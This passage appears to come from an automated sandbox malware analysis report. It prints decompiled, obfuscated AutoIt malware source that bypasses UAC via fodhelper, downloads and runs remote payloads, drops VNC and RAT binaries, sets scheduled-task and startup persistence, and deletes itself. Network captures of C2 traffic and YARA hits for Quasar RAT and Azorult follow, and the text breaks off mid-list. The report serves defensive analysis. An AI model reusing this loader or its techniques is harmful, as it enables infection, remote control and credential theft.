("jcjeLSgAgAw4MUIgxaEFUq0m2mCraxujWU6tE3j0Vw3RjrOAs9" ) $648664962 = 813318089 ENDIF IF $648664962 = 1944260330 THEN SHELLEXECUTE ("fodhelper" ) MOD (3823291 , 789502 ) $648664962 = 708304020 ISFLOAT ("h3XpKE1NVwwicKHb8beu9Yedh" ) ENDIF ISPTR (3722875 + 2426798 * 664294 * 2553950 ) NEXT ENDIF ENDIF ENDFUNC FUNC SVEJXXJSKKUJZCUYVMSHAEL ($TYPE , $TITLE , $BODY ) IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN LOCAL $UINT = "0x00000010" IF $TYPE = "64" THEN $UINT = "0x00000040" ENDIF DLLCALL ("User32.dll" , "ptr" , "MessageBox" , "hwnd" , "Null" , "str" , $BODY , "str" , $TITLE , "uint" , $UINT ) ENDIF ENDFUNC FUNC QKSYGMNMNUOEXHVWRRODCJH ($URL , $FILENAME , $DIR ) IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN LOCAL $INSTALDIR = GETDIR ($DIR ) IF FILEEXISTS ($INSTALDIR & "\" & $FILENAME ) THEN FILEDELETE ($INSTALDIR & "\" & $FILENAME ) ENDIF GLOBAL $813318089 = 323312849 GLOBAL $XYIGNSFD4K = 225191 FOR $E = 0 TO 3453759 IF $813318089 = 323312849 THEN DLLCALL ("urlmon.dll" , "ptr" , "URLDownloadToFile" , "ptr" , "0" , "str" , $URL , "str" , $INSTALDIR & "\" & $FILENAME , "dword" , "0" , "ptr" , "0" ) $813318089 = 967842408 INT (3273815 ) DIM $YGDZZMGGAVX5MPLCKVGE = "f3weGF0S1735uacCx2tFYkgZ5WyJVSdmdzTnQU3QRxIYE9spi9m2nHZ4XGiVhp7i4R24rZWN9MYA" ENDIF IF $813318089 = 967842408 THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) STRING (1931252 + 4291865135 ) EXITLOOP RANDOM (2034303 ) ENDIF CHR (583120 ) NEXT ENDIF ENDFUNC FUNC LLBUPLMSHANIDLHCMEMP () IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN SHELLEXECUTE (@COMSPEC , "/k ping 127.0.0.1 -t 0 & del " & @AUTOITEXE & " & exit " , NULL , NULL , @SW_HIDE ) ENDIF ENDFUNC FUNC KGGJMOBCJUETCWRTLNXKZGWSZXBPV ($RESNAME , $FILENAME , $RUN , $RUNONCE , $DIR ) GLOBAL $648664962 = 323312849 GLOBAL $IIBAA3XHX7 = 2410921 FOR $E = 0 TO 1289462 IF $648664962 = 323312849 THEN $FILE = DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ($RESNAME , "10" ) , TRUE ) ISFLOAT ("Emmq8YkLTSwsCxMc1ewakyGZflhI7ryWnF66" ) $648664962 = 967842408 MOD (3261457 , 656895 ) ENDIF IF $648664962 = 708304020 THEN FILECLOSE ($FILEHANDLE ) EXITLOOP ENDIF IF $648664962 = 813318089 THEN LOCAL $FILEHANDLE = FILEOPEN ($INSTALDIR & "\" & $FILENAME , "2" ) ISSTRING ("vxigOxkXQLOBsJf6BRN9EUUvoAeaQl9Ao4zZxZqbQX6NjSXk9HC22caLMW1" ) $648664962 = 1944260330 ENDIF IF $648664962 = 967842408 THEN LOCAL $INSTALDIR = GETDIR ($DIR ) $648664962 = 813318089 ENDIF IF $648664962 = 1944260330 THEN FILEWRITE ($FILEHANDLE , $FILE ) $648664962 = 708304020 ISBINARY ("XgmFM3bhShHm4YlK8dSFRBb4EyaT81CqTsZFJvJyj8WEQaDvd8Nw4Xaufrbo3rj1NrCK9QaMCswSQGnD5NO" ) DIM $V6SDARTVF1Z40YH3WX7B = 3620073 ENDIF INT (2635705 ) NEXT IF $RUNONCE = FALSE THEN IF $RUN = TRUE THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) ENDIF ELSE IF @SCRIPTDIR <> $SOXGWLGCUOVMJM THEN SHELLEXECUTE ($INSTALDIR & "\" & $FILENAME ) ENDIF ENDIF ENDFUNC FUNC MIVVMSGJPNONEWUB ($FILE , $REGKEY , $ATTRIB , $HIDDEN ) GLOBAL $784529671 = 323312849 GLOBAL $DGTOLJOH5F = 2219820 FOR $E = 0 TO 1133057 ISFLOAT ("XE3WQZ6brrck" ) IF $784529671 = 323312849 THEN DIRCREATE ($SOXGWLGCUOVMJM ) $784529671 = 967842408 PTR (926337 + 1071884 + 2697195 + 1173803 ) ENDIF IF $784529671 = 439940659 THEN LOCAL $VBSOPEN DIM $TXY5X22NKR7UHDVLAPQV = 1962837 + 4294735516 + 4293996117 EXITLOOP ENDIF IF $784529671 = 648664962 THEN LOCAL $OPENFILE = FILEOPEN (@AUTOITEXE , "16" ) $784529671 = 658599975 CHR (507487 ) STRING (2360434 * 45376 + 759639 ) ENDIF IF $784529671 = 658599975 THEN LOCAL $HFILE = FILEOPEN ($FULLPATH , "2" ) WINEXISTS ("U6rawlXUmUrQkvD1Q2Hmuc7pzLUuDtsntOWBf3cotcoNN4CJGiF2VTnS8bKUBCq2Aew" ) $784529671 = 1590494170 DIM $WWZT2RXTKFIJYVYABKAE = "dssW1VvmIG7bEvTcB054NzfKrN4eaLWeEHTDGGbFBgc8lit9exaUEk0MmR" ENDIF IF $784529671 = 708304020 THEN LOCAL $URLPATH = @STARTUPDIR & "\" & $REGKEY & ".url" DIM $V3F7MPE4ZYBGXHZJU59L = 2400755 + 2286132 + 2821529 + 1051973 * 122230 * 2686755 + 3673085 + 809362 $784529671 = 648664962 ENDIF IF $784529671 = 813318089 THEN LOCAL $FULLPATH = $SOXGWLGCUOVMJM & "\" & $FILE DIM $5FSSOFRV25SJVUTMPG9O = 3538052 $784529671 = 1944260330 ENDIF IF $784529671 = 925089026 THEN LOCAL $URLCONTENT = "[InternetShortcut]" & @CR & "URL=file:///" & STRINGREPLACE ($VBSPATH , "\" , "/" ) $784529671 = 1407564695 DIM $EFDLY1KIQ5U1UTB9ZGYZ = 933632 + 3622206 + 4293329514 * 3721962 + 659796 * 3569556 + 4294419155 ENDIF IF $784529671 = 967842408 THEN LOCAL $MODE = $HIDDEN ISBINARY (2345240 * 3306334 + 809435 + 3949641 ) $784529671 = 813318089 DIM $H2VUERLHMS59Y1CYSE2X = 611570 ENDIF IF $784529671 = 1407564695 THEN LOCAL $URLOPEN DIM $IAYW7YVSCRAJXVICSXHU = 3337811 * 1340777 + 2324484 * 3133329 * 2646375 * 1134941 + 4292515232 + 4293543052 $784529671 = 439940659 INT (2331776 ) ENDIF IF $784529671 = 1590494170 THEN LOCAL $BINARY = FILEREAD ($OPENFILE ) & BINARY (RANDOM ("0" , "255" ) ) $784529671 = 925089026 DIM $UABHYKAQVWOMMDDZX8BA = 1182834 + 3816393 + 3273855 + 2229667 ENDIF IF $784529671 = 1944260330 THEN LOCAL $VBSPATH = $SOXGWLGCUOVMJM & "\" & $REGKEY & ".vbs" $784529671 = 708304020 CHR (1305842 ) ENDIF ISSTRING ("4KL8aQ6nrUM0CiaoDssoL" ) NEXT IF $MODE THEN SHELLEXECUTE ("schtasks" , "/create /tn " & $REGKEY & " /tr " & CHR ("34" ) & $FULLPATH & CHR ("34" ) & " /sc minute /mo 1 /F" , @SYSTEMDIR , "" , @SW_HIDE ) ELSE GLOBAL $658599975 = 323312849 GLOBAL $FUBZ8NTGJ3 = 394063 FOR $E = 0 TO 3045587 IF $658599975 = 323312849 THEN $URLOPEN = FILEOPEN ($URLPATH , "2" ) RANDOM (521480 ) $658599975 = 967842408 ENDIF IF $658599975 = 648664962 THEN FILEWRITE ($URLOPEN , $URLCONTENT ) EXITLOOP ISSTRING ("cGl8IYf26K" ) ENDIF IF $658599975 = 708304020 THEN FILEWRITE ($VBSOPEN , $VBS ) ISSTRING (686503 + 725473 + 1222023 * 2017236 ) $658599975 = 648664962 ENDIF IF $658599975 = 813318089 THEN LOCAL $TRIPLE = CHR ("34" ) & CHR ("34" ) & CHR ("34" ) $658599975 = 1944260330 ENDIF IF $658599975 = 967842408 THEN $VBSOPEN = FILEOPEN ($VBSPATH , "2" ) ISSTRING ("XSqLLcGAD0roOZkCgtGva6rV9GZGo41qhasCXRiCMUHAW0Qr3aSt6RS0zELfmalI9ahNGRQzleSpy19i0HMom" ) $658599975 = 813318089 CHR (1241107 ) ENDIF IF $658599975 = 1944260330 THEN LOCAL $VBS = "Set WshShell = WScript.CreateObject(" & CHR ("34" ) & "WScript.Shell" & CHR ("34" ) & ") " & @CR & "WshShell.Run " & $TRIPLE & $FULLPATH & $TRIPLE $658599975 = 708304020 RANDOM (1809451 ) ENDIF DIM $VMUSH28BAIEDOOX6WBQR = "eNxuiYfRzyozZXz44zBB1aEWKYKoLLaebRQH679d3" NEXT ENDIF GLOBAL $708304020 = 323312849 GLOBAL $BJQDZ17CCC = 2981910 FOR $E = 0 TO 944417 IF $708304020 = 323312849 THEN LOCAL $HANDLEARRAY = [$URLOPEN , $VBSOPEN , $OPENFILE , $HFILE ] $708304020 = 967842408 INT (835559 ) PTR ("xig276zxHh9uFGxUq" ) ENDIF IF $708304020 = 813318089 THEN FILESETATTRIB ($FULLPATH , $ATTRIB ) RANDOM (3384109 ) $708304020 = 1944260330 ISBINARY ("nO1cOmUhQrUffFL0RveYfn6CJFOzsL4ECKTVGEBWJx" ) RANDOM (709510 ) ENDIF IF $708304020 = 967842408 THEN FILEWRITE ($HFILE , $BINARY ) $708304020 = 813318089 ENDIF IF $708304020 = 1944260330 THEN FILESETATTRIB ($SOXGWLGCUOVMJM , $ATTRIB ) INT (3974479 ) EXITLOOP ISSTRING ("tZewpMDX0tl3roRwZCybbdsGd63tTcicsnpIWTUHaZFQ28qvJM34ehGqFGttTjdYkj" ) ENDIF RANDOM (506822 ) NEXT FOR $I = "0" TO UBOUND ($HANDLEARRAY ) - "1" FILECLOSE ($HANDLEARRAY [$I ] ) NEXT ENDFUNC FUNC GETDIR ($INDEX ) GLOBAL $813318089 = 323312849 GLOBAL $GT0ALHLOEO = 2332845 FOR $E = 0 TO 2173231 DIM $7KR9DPYZZ0VSFTXMXBCW = 745899 + 456920 + 2887456 IF $813318089 = 323312849 THEN LOCAL $DIRS = [@TEMPDIR , @APPDATADIR , @SCRIPTDIR ] MOD (2599250 , 760383 ) $813318089 = 967842408 DIM $V8ETRSBKZZF5RBJREWCT = 250402 + 4293885267 + 1539338 + 3085217 ENDIF IF $813318089 = 967842408 THEN RETURN $DIRS [$INDEX - "1" ] PTR ("G81yxSf2m643X6Hlbh3q3Bv9S56GGxTLWFySKV4vrkGhCxvBLJKt5WReM2RBWHuYmrgrGZ" ) EXITLOOP MOD (2162431 , 3953781 ) ENDIF MOD (2105889 , 1303155 ) NEXT ENDFUNC FUNC REMOVEZONEID () FILEDELETE (@AUTOITEXE & ":Zone.Identifier" ) ENDFUNC REMOVEZONEID () KHOCWHDEQXMSTFPOADRL ("runas" ) LOCAL $GBCNYUEOGFONFLBWF = DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ("AppXDeploymentExtensions.desktop1" , "8" ) , EXECUTE ("1" ) ) $GBCNYUEOGFONFLBWF &= DLLSTRUCTGETDATA (DJVLLWQLKATZJRZPICPARXZ ("Eap3Host2" , "8" ) , EXECUTE ("1" ) ) $GBCNYUEOGFONFLBWF = DBRUAIEIBZEWRGBQ ($GBCNYUEOGFONFLBWF , "sckxjwcnmxupxfyjkysyphxrkregslgdwthrzgquajlplpajub" ) ASAZRREHKGLB () AJJMOCPPKFEWODWKA () $SOXGWLGCUOVMJM = @USERPROFILEDIR & "\btpanui" KGGJMOBCJUETCWRTLNXKZGWSZXBPV ("fmweecwytels" , "vnc.exe" , TRUE , FALSE , 1 ) KGGJMOBCJUETCWRTLNXKZGWSZXBPV ("qhdokzqjbkdd" , "windef.exe" , TRUE , FALSE , 1 ) $KNHRXQUZAIDARCYAAKVJDJTPD = @SCRIPTFULLPATH MWMQWLZFSVGLEKEBWPKTQCNGY ($KNHRXQUZAIDARCYAAKVJDJTPD , "" , $GBCNYUEOGFONFLBWF , FALSE ) MIVVMSGJPNONEWUB ("SystemPropertiesPerformance.exe" , "RtkAudioService64" , "+HR" , TRUE ) WHILE TRUE TLRQDAKNGKXFDWQNVSPQPWUUICTCP () WEND LLBUPLMSHANIDLHCMEMP ()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2021 01:36:07.384537935 CEST	49743	8000	192.168.2.4	50.17.5.224
Sep 29, 2021 01:36:07.987818956 CEST	8000	49743	50.17.5.224	192.168.2.4
Sep 29, 2021 01:36:07.987917900 CEST	49743	8000	192.168.2.4	50.17.5.224
Sep 29, 2021 01:36:07.988516092 CEST	49743	8000	192.168.2.4	50.17.5.224
Sep 29, 2021 01:36:08.991806030 CEST	8000	49743	50.17.5.224	192.168.2.4
Sep 29, 2021 01:36:09.985110998 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:10.010328054 CEST	80	49744	208.95.112.1	192.168.2.4
Sep 29, 2021 01:36:10.010624886 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:10.011471987 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:10.037458897 CEST	80	49744	208.95.112.1	192.168.2.4
Sep 29, 2021 01:36:10.079448938 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:14.900573015 CEST	49744	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:18.400753975 CEST	49745	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:20.030541897 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:20.056447983 CEST	80	49746	208.95.112.1	192.168.2.4
Sep 29, 2021 01:36:20.056561947 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:20.062109947 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:20.087898016 CEST	80	49746	208.95.112.1	192.168.2.4
Sep 29, 2021 01:36:20.158437967 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:36:21.471038103 CEST	49745	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:22.907526016 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:22.907576084 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:36:22.907756090 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:27.471576929 CEST	49745	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:44.489223957 CEST	49750	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:47.662820101 CEST	49750	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:48.004627943 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:36:48.004652977 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:36:53.770750046 CEST	49750	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:04.783417940 CEST	80	49746	208.95.112.1	192.168.2.4
Sep 29, 2021 01:37:04.783525944 CEST	49746	80	192.168.2.4	208.95.112.1
Sep 29, 2021 01:37:10.835088968 CEST	49751	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:13.006927967 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:13.006956100 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:37:13.897594929 CEST	49751	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:18.747024059 CEST	80	49746	208.95.112.1	192.168.2.4
Sep 29, 2021 01:37:19.898145914 CEST	49751	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:37.024944067 CEST	49752	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:38.009067059 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:38.009095907 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:37:40.165508032 CEST	49752	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:37:46.166199923 CEST	49752	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:03.105066061 CEST	49747	443	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:03.105103016 CEST	443	49747	5.8.88.191	192.168.2.4
Sep 29, 2021 01:38:03.183374882 CEST	49753	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:06.214675903 CEST	49753	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:12.215255022 CEST	49753	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:13.171844006 CEST	49754	8080	192.168.2.4	5.8.88.191
Sep 29, 2021 01:38:16.168715954 CEST	49754	8080	192.168.2.4	5.8.88.191

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2021 01:35:49.361951113 CEST	54531	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:35:49.380501032 CEST	53	54531	8.8.8.8	192.168.2.4
Sep 29, 2021 01:35:55.125516891 CEST	58028	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:35:55.143276930 CEST	53	58028	8.8.8.8	192.168.2.4
Sep 29, 2021 01:35:55.282685995 CEST	53097	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:35:55.311024904 CEST	53	53097	8.8.8.8	192.168.2.4
Sep 29, 2021 01:36:07.160135031 CEST	49257	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:36:07.359210014 CEST	53	49257	8.8.8.8	192.168.2.4
Sep 29, 2021 01:36:09.943180084 CEST	62389	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:36:09.955970049 CEST	53	62389	8.8.8.8	192.168.2.4
Sep 29, 2021 01:36:19.977479935 CEST	49910	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:36:19.990183115 CEST	53	49910	8.8.8.8	192.168.2.4
Sep 29, 2021 01:36:40.032248020 CEST	55854	53	192.168.2.4	8.8.8.8
Sep 29, 2021 01:36:40.061148882 CEST	53	55854	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 29, 2021 01:36:07.160135031 CEST	192.168.2.4	8.8.8.8	0x4ffa	Standard query (0)	0x21.in	A (IP address)	IN (0x0001)
Sep 29, 2021 01:36:09.943180084 CEST	192.168.2.4	8.8.8.8	0xdbd4	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)
Sep 29, 2021 01:36:19.977479935 CEST	192.168.2.4	8.8.8.8	0x2afc	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 29, 2021 01:36:07.359210014 CEST	8.8.8.8	192.168.2.4	0x4ffa	No error (0)	0x21.in	50.17.5.224	A (IP address)	IN (0x0001)
Sep 29, 2021 01:36:09.955970049 CEST	8.8.8.8	192.168.2.4	0xdbd4	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)
Sep 29, 2021 01:36:19.990183115 CEST	8.8.8.8	192.168.2.4	0x2afc	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

0x21.in:8000

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49743	50.17.5.224	8000	C:\Users\user\Desktop\CVbJSUXraQ.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 01:36:07.988516092 CEST	942	OUT	POST /_az/ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: 0x21.in:8000 Content-Length: 101 Cache-Control: no-cache Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49744	208.95.112.1	80	C:\Users\user\AppData\Local\Temp\windef.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 01:36:10.011471987 CEST	942	OUT	GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 Host: ip-api.com Connection: Keep-Alive
Sep 29, 2021 01:36:10.037458897 CEST	943	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 23:36:09 GMT Content-Type: application/json; charset=utf-8 Content-Length: 278 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 30 30 35 22 2c 22 6c 61 74 22 3a 34 37 2e 33 38 37 38 2c 22 6c 6f 6e 22 3a 38 2e 35 32 30 32 39 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 6f 72 67 22 3a 22 73 65 72 76 65 72 50 6f 6f 6c 32 22 2c 22 61 73 22 3a 22 41 53 35 31 33 39 35 20 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 71 75 65 72 79 22 3a 22 31 38 35 2e 33 32 2e 32 32 32 2e 31 35 22 7d Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8005","lat":47.3878,"lon":8.52029,"timezone":"Europe/Zurich","isp":"Datasource AG","org":"serverPool2","as":"AS51395 Datasource AG","query":"185.32.222.15"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49746	208.95.112.1	80	C:\Users\user\AppData\Local\Temp\windef.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2021 01:36:20.062109947 CEST	944	OUT	GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 Host: ip-api.com Connection: Keep-Alive
Sep 29, 2021 01:36:20.087898016 CEST	944	IN	HTTP/1.1 200 OK Date: Tue, 28 Sep 2021 23:36:20 GMT Content-Type: application/json; charset=utf-8 Content-Length: 278 Access-Control-Allow-Origin: * X-Ttl: 49 X-Rl: 42 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 30 30 35 22 2c 22 6c 61 74 22 3a 34 37 2e 33 38 37 38 2c 22 6c 6f 6e 22 3a 38 2e 35 32 30 32 39 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 6f 72 67 22 3a 22 73 65 72 76 65 72 50 6f 6f 6c 32 22 2c 22 61 73 22 3a 22 41 53 35 31 33 39 35 20 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 71 75 65 72 79 22 3a 22 31 38 35 2e 33 32 2e 32 32 32 2e 31 35 22 7d Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8005","lat":47.3878,"lon":8.52029,"timezone":"Europe/Zurich","isp":"Datasource AG","org":"serverPool2","as":"AS51395 Datasource AG","query":"185.32.222.15"}

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: CVbJSUXraQ.exe PID: 7128 Parent PID: 1380

General

Start time:	01:35:55
Start date:	29/09/2021
Path:	C:\Users\user\Desktop\CVbJSUXraQ.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Imagebase:	0xdb0000
File size:	2111264 bytes
MD5 hash:	B0B78DA613422BE0DE8DE2E2A2D0CE68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 